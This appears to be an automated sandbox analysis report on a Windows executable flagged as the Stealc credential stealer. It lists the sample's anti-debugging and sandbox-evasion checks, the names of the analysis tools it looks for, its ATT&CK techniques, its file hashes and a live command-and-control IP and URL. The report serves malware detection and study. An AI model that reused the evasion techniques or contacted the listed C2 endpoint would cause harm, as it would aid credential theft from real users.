                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0301 second address: 4CF0307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 421BD9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 421C8E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5CC0E8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DFF49 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64F954 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001D38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001D4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_001CDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_001CE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_001CED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001D4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001CDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_001CBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001CF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001D3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001C16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C1160 GetSystemInfo,ExitProcess,0_2_001C1160
                Source: file.exe, file.exe, 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarejBH
                Source: file.exe, 00000000.00000002.1747423410.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747423410.0000000000E97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13598
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13595
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13649
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13615
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13610
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C45C0 VirtualProtect ?,00000004,00000100,000000000_2_001C45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001D9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9750 mov eax, dword ptr fs:[00000030h]0_2_001D9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001D7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6792, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001D9600
                Source: file.exe, file.exe, 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: BZProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_001D7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_001D6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001D7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_001D7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.1c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1705421415.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6792, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.1c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1705421415.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6792, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phpk17%VirustotalBrowse
                http://185.215.113.37/i17%VirustotalBrowse
                http://185.215.113.37/(17%VirustotalBrowse
                http://185.215.113.37/ws17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php=17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php=file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpkfile.exe, 00000000.00000002.1747423410.0000000000E63000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.php?file.exe, 00000000.00000002.1747423410.0000000000E63000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/(file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/ifile.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/wsfile.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/e2b1563c6670f193.phpa-7368302a1ad4file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.37
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1523774
                    Start date and time:2024-10-02 02:00:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 2m 45s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:1
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 80%
                    • Number of executed functions: 19
                    • Number of non-executed functions: 92
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.947078056996542
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'829'888 bytes
                    MD5:5cace3141ff06d98c584bfb6681a8ae3
                    SHA1:0993adfa0a320e79a33495bd92c2f457714cca95
                    SHA256:34e912b828576002110972ce8292a94d4ecebb1582816dcb1414ea2f334827aa
                    SHA512:199c0cfe737419829ba7ecc2ee68ca83fe1b042cb20d4f134be45d733a97483111d48f6845b18bb15963097503ef2524e9d1e0fa66e580ac8e7df1fb15b11394
                    SSDEEP:49152:UvjRiEOQx6/EYnSZMyIXDsP7n/SyzEGyOK4HKt:yRibQU/Pn4MyIzsPTlzEGjK4
                    TLSH:E38533FEE714216CD5EE4178CE7B47336BACE6058BD52D1317982EFC81A4A18B87B112
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                    File Icon

                    Icon Hash:90cececece8e8eb0

                    Static PE Info

                    General

                    Entrypoint:0xa97000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007F789D28CAFAh
                    bswap edx
                    sbb eax, dword ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    jmp 00007F789D28EAF5h
                    add byte ptr [0000000Ah], al
                    add byte ptr [eax], al
                    add byte ptr [eax], dl
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [edx], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx+00000080h], dh
                    add byte ptr [eax], al
                    add byte ptr [eax], dh
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    and al, 00h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    or byte ptr [eax+00000000h], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    push es
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], dl
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [0000000Ah], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx], al
                    add byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add eax, 0000000Ah
                    add byte ptr [eax], al
                    add byte ptr [eax], dh
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx], cl
                    add byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Rich Headers

                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x25b0000x22800ce1ed224783d28a14ee001051e9a5272unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x25e0000x29f0000x20091ceca0d1aa7ade50fae50d539092075unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    epsygglv0x4fd0000x1990000x1988005094dc35b606e1c3d96babc0becc2292False0.9947550107099143data7.95332225365963IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    ncsgechg0x6960000x10000x60012bc8e1d20c3a60015382fe6072f55abFalse0.5670572916666666data4.937401699613444IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x6970000x30000x22004711238df17f1f1524eb484e6e4dc7aeFalse0.08938419117647059DOS executable (COM)0.9675635496509017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-10-02T02:01:04.104690+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 2, 2024 02:01:03.180196047 CEST4973080192.168.2.4185.215.113.37
                    Oct 2, 2024 02:01:03.185216904 CEST8049730185.215.113.37192.168.2.4
                    Oct 2, 2024 02:01:03.185298920 CEST4973080192.168.2.4185.215.113.37
                    Oct 2, 2024 02:01:03.185663939 CEST4973080192.168.2.4185.215.113.37
                    Oct 2, 2024 02:01:03.190577030 CEST8049730185.215.113.37192.168.2.4
                    Oct 2, 2024 02:01:03.879561901 CEST8049730185.215.113.37192.168.2.4
                    Oct 2, 2024 02:01:03.879806042 CEST4973080192.168.2.4185.215.113.37
                    Oct 2, 2024 02:01:03.882147074 CEST4973080192.168.2.4185.215.113.37
                    Oct 2, 2024 02:01:03.886959076 CEST8049730185.215.113.37192.168.2.4
                    Oct 2, 2024 02:01:04.104403973 CEST8049730185.215.113.37192.168.2.4
                    Oct 2, 2024 02:01:04.104690075 CEST4973080192.168.2.4185.215.113.37
                    Oct 2, 2024 02:01:07.446368933 CEST4973080192.168.2.4185.215.113.37

                    HTTP Request Dependency Graph

                    • 185.215.113.37

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449730185.215.113.37806792C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
